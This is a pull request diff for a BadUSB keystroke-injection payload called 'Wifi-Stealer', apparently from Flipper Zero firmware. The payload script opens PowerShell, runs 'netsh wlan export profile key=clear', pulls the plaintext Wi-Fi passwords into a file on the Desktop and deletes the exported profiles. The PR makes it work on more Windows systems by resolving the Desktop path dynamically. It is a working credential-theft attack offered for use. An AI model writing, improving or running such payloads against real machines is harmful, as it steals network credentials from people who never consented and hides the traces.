### PR TITLE
Update Wifi-Stealer_ORG.txt

### DIFF
--- a/applications/main/bad_usb/resources/badusb/Wifi-Stealer_ORG.txt
+++ b/applications/main/bad_usb/resources/badusb/Wifi-Stealer_ORG.txt
@@ -9,5 +9,5 @@ DELAY 500
 STRING powershell 
 ENTER
 DELAY 500
-STRING cd C:\Users\$env:UserName\Desktop; netsh wlan export profile key=clear; Select-String -Path Wi-Fi-* -Pattern 'keyMaterial' | % { $_ -replace '</?keyMaterial>', ''} | % {$_ -replace "C:\\Users\\$env:UserName\\Desktop\\", ''} | % {$_ -replace '.xml:22:', ''} > 0.txt; del Wi-Fi-*;exit
+STRING $desktopPath = [System.Environment]::GetFolderPath('Desktop');cd $desktopPath; netsh wlan export profile key=clear; Select-String -Path Wi-Fi-* -Pattern 'keyMaterial' | % { $_ -replace '</?keyMaterial>', ''} | % {$_ -replace "C:\\Users\\$env:UserName\\Desktop\\", ''} | % {$_ -replace '.xml:22:', ''} > 0.txt; del Wi-Fi-*; exit
 ENTER


### PR DESCRIPTION
# What's new

We used [System.Environment]::GetFolderPath('Desktop') in PowerShell, which dynamically retrieves the path to the user's Desktop, regardless of language or configuration. By storing this path in a variable and then using cd or Set-Location, the command becomes adaptable for all Windows systems, regardless of language or cloud sync settings.

# Verification 

- same procedure for a bad usb

# Checklist (For Reviewer)

 -PR has a description of feature/bug
 -Description contains actions to verify feature/bugfix
 -I've built this code, uploaded it to the device, and verified the feature/bugfix
